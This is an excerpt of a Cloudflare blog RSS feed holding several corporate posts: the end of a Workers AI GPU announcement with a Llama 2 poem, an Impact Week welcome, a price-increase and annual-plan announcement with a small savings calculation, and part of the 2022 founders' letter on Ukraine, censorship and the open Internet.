    <p>Running on the device is too small. Running on the centralized public cloud is too far. It’s like the story of “Goldilocks and the Three Bears”: the right answer is somewhere in between. That's why today we're excited to be rolling out modern GPU resources across Cloudflare's global connectivity cloud. The third place for AI inference. Not too small. Not too far. The perfect step in between. By the end of the year, you'll be able to run AI models in more than 100 cities in 40+ countries where Cloudflare operates. By the end of 2024, we plan to have inference-tuned GPUs deployed in nearly every city that makes up Cloudflare's global network and within milliseconds of nearly every device connected to the Internet worldwide.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/fVvmxz6QyAagRfc7jnKlL/c5ee84b4149ace4a7d041fb34211892a/Untitled--3--1.png" />
            
            </figure><p>(A brief shout out for the Cloudflare team members who are, as of this moment, literally dragging suitcases full of NVIDIA GPU cards around the world and installing them in the servers that make up our network worldwide. It takes a lot of atoms to move all the bits that we do, and it takes intrepid people spanning the globe to update our network to facilitate these new capabilities.)</p><p>Running AI in a connectivity cloud like Cloudflare gives you the best of both worlds: nearly boundless resources running locally near any device connected to the Internet. And we've made it flexible to run whatever models a developer creates, easy to use without needing a dev ops team, and inexpensive to run where you only pay for when we're doing inference work for you.</p><p>To make this tangible, think about a Cloudflare customer that makes consumer wearable devices. They make devices that need to be smart but also affordable and have the longest possible battery life. As explorers rely on them literally to navigate out of harrowing conditions, tradeoffs aren't an option. That's why, when they heard about Cloudflare Workers AI, they immediately knew it was something they needed to try. The promise is powerful devices that are still affordable and have great battery life while still respecting users’ privacy and security.</p><p>They are one of the limited set of customers we gave an early sneak peek to, all of whom immediately started running off ideas of what they could do next and clamoring to get more access. We feel like we’ve seen it and are here to report: the not-so-distant future is super cool.</p>
    <div>
      <h3>The spirit of helping build a better Internet</h3>
      <a href="#the-spirit-of-helping-build-a-better-internet">
        
      </a>
    </div>
    <p>Over the years we've announced several things on our birthday that have gone on to change the future of the Internet. On our <a href="/introducing-cloudflares-automatic-ipv6-gatewa/">first birthday</a>, we announced an IPv6 gateway that has helped the Internet scale past its early protocol decisions. On our <a href="/introducing-universal-ssl/">fourth birthday</a>, we announced that we were making encryption free and doubled the size of the encrypted web in a day. On our <a href="/code-everywhere-cloudflare-workers/">seventh birthday</a>, we launched the Workers platform that has revolutionized how modern applications are developed. <a href="/introducing-r2-object-storage/">On our eleventh birthday</a> we announced R2 and further freed data from the captivity clouds.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2Zu0yp9b8e6WiwtsfH8GFM/607ec11c1efc0ffae173bcbc762957ee/Untitled--4--1.png" />
            
            </figure><p>This year, as we celebrate Cloudflare's thirteenth birthday, we set out to have as dramatic an impact on AI development as we have in other areas we've focused on in the past: providing tools that bring affordable, powerful AI inference to anyone, anywhere on Earth.</p>
    <div>
      <h3>Closing with a poem</h3>
      <a href="#closing-with-a-poem">
        
      </a>
    </div>
    <p>And so, to commemorate that, let's close with a poem about the connectivity cloud. This one was generated using a tiny bit of code and Meta's Llama 2 <a href="https://www.cloudflare.com/learning/ai/what-is-large-language-model/">LLM model</a> running on Cloudflare's Workers AI platform in a data center not far from where we're writing this…</p><p><code><i>Prompt: “Write a poem that talks about the connectivity cloud and contrast it with the captivity cloud”</i></code></p><p>The connectivity cloud, a wondrous sight to see,</p><p>Where data flows and knowledge is set free,</p><p>A place where minds meet and ideas take flight,</p><p>A world of endless possibility in sight.</p><p></p><p>But then there's the captivity cloud, a darker place,</p><p>Where thoughts are trapped and minds are in disgrace,</p><p>A prison of the mind, where freedom's lost,</p><p>A world of endless sorrow and cost.</p><p></p><p>So let us choose the connectivity cloud,</p><p>And let our minds be free and allowed,</p><p>To soar and glide and reach for the sky,</p><p>And never be held back, but always fly.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3aZzQ7Vw4G69UGP0rGcepY/91eb15cde2fd66f58e36a4306c039ff6/Screenshot-2023-09-27-at-09.54.04.png" />
            
            </figure>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6SI9dzaeXO0iBoPxQNDdh5/4230708aaf9a2d74dac2688aa0cd150a/Untitled--5-.png" />
            
            </figure><p></p> ]]></content:encoded>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[Connectivity Cloud]]></category>
            <category><![CDATA[Founders' Letter]]></category>
            <category><![CDATA[Better Internet]]></category>
            <guid isPermaLink="false">3lnlO41gonF28Yk7CXzzno</guid>
            <dc:creator>Matthew Prince</dc:creator>
            <dc:creator>Michelle Zatlyn</dc:creator>
        </item>
        <item>
            <title><![CDATA[Welcome to Cloudflare’s Impact Week]]></title>
            <link>https://blog.cloudflare.com/welcome-to-cloudflares-impact-week/</link>
            <pubDate>Sun, 11 Dec 2022 18:00:00 GMT</pubDate>
            <description><![CDATA[ Over the course of this Impact Week, we will tell other stories about the way that the Internet, and Cloudflare specifically, provide an optimistic opportunity to improve our world. ]]></description>
            <content:encoded><![CDATA[ <p><i></i></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6P7kxCjohuuoRRevo5uGon/c8feab6046fbd17d976d2debc5dbbbb9/h9oHzv3QUccPIAFIfbtXVq-P9jkzOwimOOe4SrnduXxcDDwD0qQdLaANVQRW-leDWmxZyNbh8ZBWnJHXQ68HAdz0HDdgetirqpze-7pQIn6UrWE4Pgk1-GPBnFJi.png" />
            
            </figure><p>In the early days of Cloudflare, we made it a policy that every new hire had to interview with either me or my co-founder Michelle. It’s still the case today, though we now have more than 3,000 employees, continue to hire great people as we find them, and, because there are only so many hours in the day, have had to enlist a few more senior executives to help with these final calls.</p><p>At first, these calls were about helping screen for new members of our small team. But, as our team grew, the purpose of these calls changed. Today, by the time I do the final call with someone, we’ve already made the decision to hire them, so it’s rarely about screening. Instead, the primary purpose is to make sure everyone joining has had a positive conversation with a senior member of our team, so if in the future they ever see something going wrong they’ll hopefully feel a bit more comfortable letting one of us know. Because of that, I think these calls are some of the most important work I do.</p><p>But, for me, there’s another purpose. I get to hear first-hand why people chose to apply. That’s a barometer for what we’re doing right, evaluated by someone with a perspective outside the organization. And, nearly every day, I hear some version of the same thing: the most consistent reason new employees want to join Cloudflare is because of our mission and the breadth of our impact.</p><p>Our team wants the work they do to have a real, positive impact for the millions of users of our services and the billions of Internet users our decisions affect downstream. It makes me smile every time someone we’re about to extend an offer to says something along the lines of “when Cloudflare pushes a new feature or product, you’re changing the entire Internet for the better. 
And I want to be part of that.” That’s why I continue to be excited about my job too.</p><p>It may seem like our mission to “help build a better Internet” has been around forever, but it wasn’t something we had at the beginning. It developed as the natural outgrowth of the team we assembled and the products we built. Today, it’s integral to Cloudflare’s DNA. Our team has always been optimistic about the Internet and its potential to do good, especially if it is founded on respect for certain values like security, privacy, interoperability, and wide availability.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5hl527omNh9R0EA4dsP0xt/f7a52a52ebe67e8ceccd9958bb1183b3/image2-12.png" />
            
            </figure><p>That’s why the focus on privacy over the past few years was always easy for us. We never sold customer data to marketers — that just didn’t seem like what would be a part of a better Internet — so when it came time to comply with new privacy laws, we didn’t have to pull back operations or cut off lines of revenue. Instead, we rolled out the use of <a href="/introducing-universal-ssl/">Universal SSL</a> to expand encryption broadly for the Internet, and we created our first consumer-facing product, <a href="/announcing-1111/">a privacy-first DNS resolver.</a></p><p>As we kick off this year’s Impact Week, we certainly see a number of challenges for the Internet, though we think the opportunities for the Internet continue to far outweigh those challenges. Around the world, we see a number of countries rejecting the opportunity to maximize the potential of the Internet, and instead, passing new laws and regulations seeking to assert narrow control of the Internet for their own self-interested purposes, including in some cases for things like commercial advantage, censorship, or surveillance.</p><p>For example, around the Russian invasion of Ukraine, we’ve seen the Russian government launch cyberattacks and use targeted Internet outages to further torment the people in Ukraine, while at the same time pressing citizens in Russia to only use Internet tools and view information controlled by the Russian government.</p><p>Yet for all those challenges, we saw a disparate group of people and companies, including Cloudflare, come together to defend Ukraine from these attacks and do everything in their power to get the Internet back online as soon as possible. 
Nearly a year into the war, and despite the relentless efforts of a very powerful nation, the Internet remains a positive force for good in Ukraine, a way to get the message out about the horrific actions of the Russian government, and a tool for dissidents inside Russia to <a href="/what-cloudflare-is-doing-to-keep-the-open-internet-flowing-into-russia-and-keep-attacks-from-getting-out/">escape the attempted grip</a> of censorship. When Russia <a href="https://www.mid.ru/ru/maps/us/1814243/">personally sanctioned me</a> earlier this year, I took it as a badge of honor that we were doing something right.</p><p>At the same time, the promise of the Internet continues to bring increased opportunity, especially in still-developing parts of the world. Increased access to reliable and secure Internet in those countries will enable education, healthcare, and commerce in ways humanity has been struggling to advance for decades.</p><p>And we’ve seen recently in Iran that the Internet remains the leading tool of liberation for oppressed voices seeking to shake off the control of authoritarian governments. This led to the somewhat unusual step by the US government of <a href="https://home.treasury.gov/news/press-releases/jy0974">relaxing some of the sanctions</a> against Iran in order to permit companies like Cloudflare greater freedom to ensure that the general population in Iran can have access to the Internet to support their cause.</p><p>Although issues like war, oppression, and misinformation are as old as humanity itself, the Internet is novel in its ability to bring together marginalized people who previously were unable to find and engage with each other because of distance, repression, or resources. 
To make sure the Internet fulfills that part of its promise, we run Project Galileo, which celebrated its 8th anniversary this year and continues to support groups serving <a href="https://www.cloudflare.com/case-studies/dream-girl-foundation/">underprivileged girls in India</a>, the <a href="https://www.cloudflare.com/case-studies/bedayaa/">LGBTQIA+ community in the Nile River Valley</a>, and <a href="https://www.cloudflare.com/case-studies/hera-digital-health/">refugees needing health care services in a private environment</a>. In total, through Project Galileo we provide Cloudflare’s services for free to more than 2,100 organizations in over 100 countries. That’s some of the work I’m the most proud of.</p><p>Over the course of this Impact Week, we will tell other stories about the ways that the Internet, and Cloudflare specifically, provide an optimistic opportunity to improve our world. And that includes the entire world, especially as the Internet is poised to further close the gaps in Internet services to the developing world that have existed since its founding.</p><p>We will describe the way Cloudflare is focused on our own impact when it comes to emissions, and the lessons we are applying to our products and operations to make sure that we are being responsible stewards of the Earth’s resources. We will review the ways that we are working to ensure that the resources needed to benefit from the Internet aren’t limited to large companies with big budgets and the means to buy the best tools.</p><p>From individuals and small businesses to nonprofits and other community organizations, we want to make sure that the costs of cybersecurity and reliability don’t exclude those poised to benefit the most from the Internet. 
Specifically this year, we’re focused on making sure that sensitive groups — including local governments and <a href="https://www.cloudflare.com/the-net/government/critical-infrastructure/">critical infrastructure</a> — are benefiting from new <a href="https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/">Zero Trust</a> tools that are increasingly necessary for all organizations.</p><p>At the end of the week, we’ll release our annual Impact Report, which provides a comprehensive review of our approach to these issues, especially when it comes to sustainability and ensuring that the Internet remains a widely available and principled place.</p><p>We take pride in the principles that lie at the core of what we do as a company. Although many of us wake up every day scanning the Internet for the latest cyberattacks to address or the latest congestion to relieve, we are energized by the Internet's ongoing promise to make life better for billions of people. This Impact Week we get to wake up and focus on those stories and share with you why all of us are here. We hope you are as excited as we are.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4vg83UwgV7TcMKneJgzSoB/2919eabed312b3c91c254f3b5c9604ad/image3-5.png" />
            
            </figure><p></p> ]]></content:encoded>
            <category><![CDATA[Impact Week]]></category>
            <guid isPermaLink="false">36v1S0XQQS7NqAeBhXTNU7</guid>
            <dc:creator>Matthew Prince</dc:creator>
        </item>
        <item>
            <title><![CDATA[Adjusting pricing, introducing annual plans, and accelerating innovation]]></title>
            <link>https://blog.cloudflare.com/adjusting-pricing-introducing-annual-plans-and-accelerating-innovation/</link>
            <pubDate>Wed, 30 Nov 2022 01:04:42 GMT</pubDate>
            <description><![CDATA[ We had never raised prices in our history, so this was something we thought about carefully before deciding to do it. While we have over a decade of network expansion and innovation under our belts, what may not be intuitive is that our goal is not to increase revenue from this change. ]]></description>
            <content:encoded><![CDATA[ 
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3bMRFknJOVEMt7n6ia7QgR/96bc3388155727714c2e69f953adae1f/Adjusting-pricing--introducing-annual-plans--accelarating-innovation-2.png" />
            
            </figure><p>Cloudflare is raising prices for the first time in the last 12 years. Beginning January 15, 2023, new sign-ups will be charged $25 per month for our Pro Plan (up from $20 per month) and $250 per month for our Business Plan (up from $200 per month). Any paying customers who sign up before January 15, 2023, including any currently paying customers who signed up at any point over the last 12 years, will stay at the old monthly price until May 14, 2023.</p><p>We are also introducing an option to pay annually, rather than monthly, that we hope most customers will choose to switch to. Annual plans are available today and discounted from the new monthly rate to $240 per year for the Pro Plan (the equivalent of $20 per month, saving $60 per year) and $2,400 per year for the Business Plan (the equivalent of $200 per month, saving $600 per year). In other words, if you choose to pay annually for Cloudflare, you can lock in our old monthly prices.</p><p>We had never raised prices in our history, so this was something we thought about carefully before deciding to do it. While we have over a decade of network expansion and innovation under our belts, what may not be intuitive is that our goal is not to increase revenue from this change. We need to invest up front in building out our network, and the main reason we're making this change is to more closely align our billing with the timing of our underlying costs. Doing so will enable us to further accelerate our network expansion and pace of innovation — which all of our customers will benefit from. Since this is a big change for us, I wanted to take the time to walk through how we came to this decision.</p>
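<p>The savings arithmetic above can be sketched in a few lines. This is purely illustrative (the function name is ours, and the prices are the figures quoted in this post, not fetched from any Cloudflare API):</p>

```python
def annual_savings(monthly_price: int, annual_price: int) -> int:
    """How much a customer saves per year by paying annually
    instead of monthly, given the two list prices."""
    return monthly_price * 12 - annual_price

# Pro Plan: $25/month vs. $240/year
assert annual_savings(25, 240) == 60     # saves $60 per year
# Business Plan: $250/month vs. $2,400/year
assert annual_savings(250, 2400) == 600  # saves $600 per year
```

<p>In both cases the annual price works out to the old monthly rate ($20 and $200 per month, respectively) paid twelve times up front.</p>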
    <div>
      <h3>Cloudflare's history</h3>
      <a href="#cloudflares-history">
        
      </a>
    </div>
    <p>Cloudflare launched on September 27, 2010. At the time we had two plans: one Free Plan that was free, and a Pro Plan that cost $20 per month. Our network at the time consisted of "four and a half" data centers: Chicago, Illinois; Ashburn, Virginia; San Jose, California; Amsterdam, Netherlands; and Tokyo, Japan. The routing to Tokyo was so flaky that we'd turn it off for half the day to not mess up routing around the rest of the world. The biggest difference for the first couple years between our Free and Pro Plans was that only the latter included HTTPS support.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/59jZ5cRvEwI47IqJRnd7Yo/63073aac5fb30abf3c8f7c143be4687c/image4-34.png" />
            
            </figure><p><i>Slide from the</i> <a href="https://www.youtube.com/watch?v=XeKWeBw1R5A"><i>Cloudflare Launch Presentation at TechCrunch Disrupt, September 27, 2010</i></a></p><p>In June 2012, we <a href="/introducing-cloudflare-business-and-cloudflar/">introduced our Business Plan for $200 per month</a> and our Enterprise Plan, which was customized for our largest customers. By then we'd not only gotten Tokyo to work reliably but <a href="https://www.cloudflare.com/press-releases/2012/cloudflares-rocketship-growth-100-million-daily-active-users-50-billion/">added 18 more data centers</a> around the world for a total of 23. Our Business Plan added DDoS mitigation as its primary benefit, something that, prior to then, we'd been terrified to offer.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5qdTOuqKTYRYEMIsFe6hRc/095471d95593bc5a6ea55989b40041c3/image1-73.png" />
            
            </figure><p><i>Cloudflare’s Network as of June 16, 2012, courtesy of</i> <a href="https://web.archive.org/web/20120616135819/http://www.cloudflare.com:80/network-map"><i>The Internet Archive’s Wayback Machine</i></a></p>
    <div>
      <h3>My how you've grown</h3>
      <a href="#my-how-youve-grown">
        
      </a>
    </div>
    <p>Fast-forward to today and a lot has changed. We now have a presence in more than <a href="https://www.cloudflare.com/network/">275 cities in more than 100 countries worldwide</a>. We included HTTPS support in our Free Plan with the launch of <a href="/introducing-universal-ssl/">Universal SSL in September 2014</a>. We included unlimited DDoS mitigation in our Free Plan with the launch of <a href="/unmetered-mitigation/">Unmetered DDoS Mitigation in September 2017</a>. Today, we stop attacks for Free Plan customers on a daily basis that are more than 10 times as big as what was <a href="/the-ddos-that-almost-broke-the-internet/">headline news back in 2013</a>.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7wSDBH2quLOUNhwF9TIvEg/8d04c4b42e3117061891de4dc335541e/The-Cloudflare-Global-Network.png" />
            
            </figure><p>Our strategy has always been to roll out new features, limit them at first to higher tiers of paying customers, and then, over time, roll them down through our plans until they eventually reach even our Free Plan customers. We believe everyone should be fast, reliable, and secure online regardless of their budget. And we believe our continued success should be driven primarily by new innovation, not by milking old features for revenue.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2RBIwmzQ7fr1g2XCZ2I6E1/f7d61ad2f0b327dc5ba86b08e368ddd6/Innovation-Milestones-2-K-1.png" />
            
            </figure><p>And we've delivered on that promise, accelerating our roll-out of new features across our platform and bundling them into our existing plans without increasing prices. What you get with our Free, Pro, and Business Plans today is orders of magnitude more valuable across every dimension — performance, reliability, and security — than those plans were when they launched.</p><p>And yet we know we are our customers’ infrastructure. You rely on us. We have therefore been very reluctant to raise prices simply to capture more revenue.</p>
    <div>
      <h3>Annual plans for even faster innovation</h3>
      <a href="#annual-plans-for-even-faster-innovation">
        
      </a>
    </div>
    <p>Early on, we only charged monthly because we were an unproven service that we knew customers were taking a risk on. Today, that's no longer the case. The majority of our customers have been using us for years and, from our conversations with them, plan to continue using us for the foreseeable future. In fact, one of the top requests we receive is from customers who want to pay once per year rather than being billed every month.</p><p>While I'm proud of our pace of innovation, one of the challenges we have is managing the cash flow to fund those investments as quickly as we'd like. We invest up front in building out our network or developing a new feature, but then only get paid monthly by our customers. That, inherently, is a governor on our pace of innovation. We can invest even faster — hire more engineers, deploy more servers — if those customers who know they're going to use us for the next year pay us up front. We have no shortage of things we know customers want us to build, so by collecting revenue earlier we know we can unlock even faster innovation.</p><p>In other words, we are making this change hoping most of you won't pay us anything more than you did before. Instead, our hope is that most of you will adopt our annual plans — you’ll get to lock in the existing pricing, and you’ll help us further accelerate our network growth and pace of innovation.</p><p>Finally, I wanted to mention something that isn't changing: our Free Plan. It will still be free. It will still have all the features it has today. And we're still committed, over time, to rolling many more features that today are available only in paid plans down to the Free Plan. Our mission is to help build a better Internet. We want to win by being the most innovative company in the world. And that means making our services available to as many people as possible, even those who can't afford to pay us right now.</p><p>But, for those of you who can pay: thank you. 
You've funded our innovation to date. And I hope you'll opt to switch to our annual billing, so we can further accelerate our network expansion and pace of innovation.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/CKc3ykFkVIw5cxAX1f17f/16faf5e12ed74e481dbcfaf4da6bbe48/unnamed-6.png" />
            
            </figure><p></p> ]]></content:encoded>
            <category><![CDATA[Product News]]></category>
            <guid isPermaLink="false">7hIsHQoXPfwoHjBcBQj5OR</guid>
            <dc:creator>Matthew Prince</dc:creator>
            <dc:creator>Michelle Zatlyn</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare’s 2022 Annual Founders’ Letter]]></title>
            <link>https://blog.cloudflare.com/cloudflares-annual-founders-letter-2022/</link>
            <pubDate>Sun, 25 Sep 2022 19:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare launched on September 27, 2010. This week we'll celebrate our 12th birthday. As has become our tradition, we'll be announcing a series of products that we think of as our gifts back to the Internet ]]></description>
            <content:encoded><![CDATA[ <p></p><p>Cloudflare launched on September 27, 2010. This week we'll celebrate our 12th birthday. As has become our tradition, we'll be announcing a series of products that we think of as our gifts back to the Internet. In previous years, these have included products and initiatives like <a href="/introducing-universal-ssl/">Universal SSL</a>, <a href="/introducing-cloudflare-workers/">Cloudflare Workers</a>, our <a href="/cloudflare-registrar/">Zero Markup Registrar</a>, the <a href="/bandwidth-alliance/">Bandwidth Alliance</a>, and <a href="/introducing-r2-object-storage/">R2</a> — <a href="/introducing-r2-object-storage/">our zero egress fee object store</a> — which <a href="/r2-ga/">went GA last week</a>.</p><p>We're really excited for what we'll be announcing this year and hope to surprise and delight all of you over the course of the week with the products and features we believe live up to our mission of helping build a better Internet.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2kae6HfsCSTPYMc7A3kTw3/5c70fd424d1913fd1ba8eeb4bbbd384e/image5-15.png" />
            
            </figure>
    <div>
      <h3>Founders' letter</h3>
      <a href="#founders-letter">
        
      </a>
    </div>
    <p>While this will be our 12th Birthday Week of product announcements, for the <a href="/a-letter-from-cloudflares-founders-2020/">last</a> <a href="/cloudflares-annual-founders-letter-2021/">two</a> years, as the cofounders of the company, we've also taken this time as an opportunity to write a letter publicly reflecting on the previous year and what's on our minds as we go into the year ahead.</p><p>Since our last birthday, it's been a tale of two halves of a very different year. At the end of 2021 and into the first two months of 2022, COVID infection rates were falling globally, effective vaccines were getting rolled out, and the world seemed to be returning to a sense of pre-pandemic normalcy.</p><p>Internally, we were starting to meet again in person with colleagues and customers. We'd weathered an unprecedented increase in traffic across our network caused by the pandemic and, with a few bumps along the way, used the challenges we'd faced through that time to rebuild our architecture to be more stable and reliable for the long term. We both felt optimistic for the future.</p>
    <div>
      <h3>Russia's invasion of Ukraine</h3>
      <a href="#russias-invasion-of-ukraine">
        
      </a>
    </div>
    <p>Then, on February 24, Russia invaded Ukraine. While we were fortunate to not have team members working from Russia, Ukraine, or Belarus, we have many employees with families in the region and six offices within a train ride of the front lines. We watched in real time as Internet <a href="/internet-traffic-patterns-in-ukraine-since-february-21-2022/">traffic patterns across Ukraine shifted</a>, a disturbing reflection of what was happening on the ground as cities were bombed and families fled.</p><p>At the same time, Russia ratcheted up its efforts to scrub the country's Internet of all non-Russian media. While we had seen some Internet restrictions in Russia over the years, historically Russian citizens were generally able to freely access nearly any resource online. The dramatically increased censorship marked an extreme change in policy and the first time a country of any scale had tried to go from a generally open Internet to one that was fully censored.</p>
    <div>
      <h3>Glimmers of hope</h3>
      <a href="#glimmers-of-hope">
        
      </a>
    </div>
    <p>But, even as the war continues to rage, there is reason for optimism. In spite of a significant increase in censorship inside Russia, physical links to the rest of the world being cut in Ukraine, cyber attacks targeting Ukrainian infrastructure, and Russian forces actively rerouting BGP in invaded regions, by and large the Internet has continued to flow. As John Gilmore once famously said: "The Net interprets censorship as damage and routes around it."</p><p>The private sector and governments around the world came together to help support Ukraine and render Russian cyberattacks largely moot. Our team provided our services for free to government, financial services, media, and civil society organizations that came under cyber attack, ensuring they stayed online. As physical Internet links were severed in the country, <a href="/steps-taken-around-cloudflares-services-in-ukraine-belarus-and-russia/">our network teams worked to route traffic through every possible path</a> to ensure not only that news from outside Ukraine could get in but, equally importantly, that pictures and news of the war could get out.</p><p>Those pictures and news of what is happening inside Ukraine continue to galvanize support. The Ukrainian government continues to function in spite of withering cyber attacks. Voices inside Russia pushing back against the regime are increasingly being heard. And ordinary Russian citizens have turned in record numbers to services like <a href="https://one.one.one.one/">Cloudflare's 1.1.1.1 App</a> to see uncensored news.</p><p>Our efforts to keep the Internet on in Russia led the Putin regime to officially sanction one of us (Matthew) — which we took as a sign that we were making a positive impact. Today we estimate approximately 5% of all households in the country continue to access the uncensored Internet using our 1.1.1.1 App, and that number continues to grow.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4omfFiGtAfNbYyJa4Gc9Oc/5b852b4f4d620a9897e2841216ad31f1/image7-5.png" />
            
            </figure>
    <div>
      <h3>The Internet's current battleground</h3>
      <a href="#the-internets-current-battleground">
        
      </a>
    </div>
    <p>2022 was not the first year in which the Internet became a battleground, but to us, it does feel like a turning point. In the last twelve months, we've seen <a href="/q2-2022-internet-disruption-summary/">more countries shut down Internet access than in any previous year</a>. Sometimes this is just a misguided and ineffectual effort to keep students from cheating on national exams. Unfortunately, it is increasingly about repressive regimes attempting to assert control.</p><p>As we write this, the <a href="/protests-internet-disruption-ir/">Iranian government is attempting to silence protests in the country through broad Internet censorship</a>. While some may suggest this is business as usual, in fact it is not. The Internet and the broad set of news and opinions it brings have generally been available in places like Iran and Russia, and we shouldn't accept that full censorship in them is the de facto status quo.</p><p>And these efforts to rein in the Internet are unfortunately not limited to Iran and Russia. Even in the liberal, democratic corners of Western Europe, incidents in which court-ordered blocking at the infrastructure layer resulted in massive overblocking spiked dramatically over the last year. Those cases will set a dangerous precedent that a single court in a single country can block access to wide swaths of the Internet.</p><p>While it may seem fine to Austrians for an Austrian court to enforce Austrian values for an issue within Austria, if any country's courts can block content at the core Internet infrastructure level, even when it results in the blocking of unrelated sites, then it will have a global impact. And, inherently, it will open the door for Afghanistan, Albania, Algeria, Andorra, Angola, Antigua, Argentina, Armenia, Australia, and Azerbaijan to do the same. And that's just the countries that start with the letter A. 
If these precedents are upheld then the Internet risks falling to the lowest common denominator of what's globally acceptable.</p>
    <div>
      <h3>An old threat to permissionless innovation</h3>
      <a href="#an-old-threat-to-permissionless-innovation">
        
      </a>
    </div>
    <p>The magic of the early Internet was that it was permissionless. Cloudflare was founded to counter a threat to that magic that was old and very different from the one we face today. Early in Cloudflare's history, we used to get asked who we were competing against. We have never thought the answer was <a href="https://www.cloudflare.com/cloudflare-vs-akamai/">Akamai</a> or EdgeCast. While, from a business perspective, we always thought of our business as <a href="https://www.youtube.com/watch?v=T47T_mG7YbU">replacing the vast catalog of Cisco's hardware boxes with scalable services</a>, that transition seemed inevitable. Instead, the existential competitor we faced was a threat to the permissionless Internet itself: Facebook.</p><p>If you find your eyebrow raised as you read that, know you're not alone. It was the universal reaction we’d get whenever we said that back in 2010, and it remains the universal reaction we get when we say it today. But it has always rung true. In 2010, when Cloudflare launched, it was getting so difficult to be online — between spam, hackers, DDoS, reliability, and performance issues — that many people, organizations, and businesses gave up on the web and sought a safe space in Facebook's walled garden.</p><p>If the challenges of being online weren't solved in some other way, there was a real risk that Facebook would, effectively, become the Internet. The magic of the Internet was that anyone with an idea could put it online and, if it resonated, thrive without having to pass through a gatekeeper. It seemed wrong to us that if those trends continued, you'd effectively have to get Facebook's permission just to be online. Preserving the permissionless Internet was a big part of what motivated us to start Cloudflare.</p><p>So we set out to help solve the problems of cyberattacks, outages, and other performance challenges, making sure that the Internet we believed in could continue to thrive. 
We built a global network able to mitigate the largest DDoS attacks easily, and to make anything connected to the Internet faster, more secure, and more reliable. We created tools to make it easy for developers to build and maintain new platforms, with the ability to deploy serverless code in an instant across the globe. We developed new ways for our customers to protect their internal systems from attack with <a href="https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/">Zero Trust</a> services. And we made it all as widely available as possible, constantly striving to provide accessible tools not only to the Fortune 1000 but also to the small businesses, nonprofits, and developers with ideas about how to build something new, creative, and good for the world.</p><p>It's not dissimilar to the story of another disruptive tech company that began a few years before we did. Shopify has been a long time Cloudflare customer using a number of our services, including our Workers developer platform. Their <a href="https://qz.com/1954108/shopify-is-arming-the-rebels-against-amazon/">unofficial rallying cry of "arming the rebels"</a> has always resonated with us.</p><p>In many ways, Shopify is to Amazon.com as Cloudflare is to Facebook. Both of the former providing the key infrastructure you need to innovate and then getting out of your way, both of the latter building a walled garden from which they can ultimately extract maximum rents.</p>
    <div>
      <h3>A New Hope</h3>
      <a href="#a-new-hope">
        
      </a>
    </div>
    <p>Shopify framing their customers as the rebels taking on the Empire of Amazon is, of course, a reference to Star Wars and so it may not be surprising that we often talk internally about the Star Wars movies as a metaphor for the history of the Internet: past, present, and maybe future.</p><p>The first movie, Episode IV, was titled "A New Hope." The plot of that movie feels a lot like how the world experienced the Internet for the 40 years prior to 2016. There was this magical thing called the Force, and it was controlled by these incredible people called Jedi. Except instead of the Force it was the Internet and instead of Jedi it was programmers and network engineers.</p><p>It's easy to forget that it's the stuff of not-too-long-ago science fiction that you could have a device in your pocket that could access the sum of all human knowledge. And yet, there are now more smartphones in active use than humans on Earth. Neither of us feel all that old, yet we both grew up in a time when if you had an opinion and wanted to get it out to a broad audience you had to write it up, send it in as a letter to the editor, and hope that it would get published.</p><p>Today in the world of Twitter and TikTok that is almost unimaginably quaint. The Internet blew that all up, just as Luke blew up the Death Star, and it's hard to overstate how much that disrupted every traditional source of power and control.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6TF9nMjjzmmBnDd9r8EXQq/8402026c35baaf3585e9c2e56431b504/image2-34.png" />
            
            </figure>
    <div>
      <h3>The Empire Strikes Back</h3>
      <a href="#the-empire-strikes-back">
        
      </a>
    </div>
    <p>But after Episode IV came Episode V: “The Empire Strikes Back.” And make no mistake, the traditional centers of control are working hard to find ways to control the Internet. While we think the shift came somewhere around 2016, it feels like in 2022 the Empire has discovered the rebel base on Hoth and the AT-ATs are closing in.</p><p>Episode V is a pretty dark movie. Spoiler alert for the small percentage of you who may not have seen it: the hero realizes his mortal enemy is his father and loses his hand, his rogue friend is encased in carbonite, and the girl he likes is sold into slug slavery shortly after she declares her love not for him but for that about-to-be-carbonite-encased friend. But it's also the best movie, because the stakes are so high.</p><p>The stakes are high for the Internet too, and we believe it's important for us to engage on the hard technology and policy issues. The next several years will be challenging as we rebuild the legacy protocols of the Internet to be more private and secure by design, so they can accommodate what the Internet has become, and as we wrestle with hard policy issues around respecting local laws and norms on a network that is inherently global. The team at Cloudflare comes to work every day appreciating the challenges and importance of what we need to do to live up to our mission.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2vs1W1ieZHQS8rQZpJuqtF/5d6553ad62313e42a2d5ba4dd5d0bc76/image1-41.png" />
            
            </figure>
    <div>
      <h3>Helping build a better Internet</h3>
      <a href="#helping-build-a-better-internet">
        
      </a>
    </div>
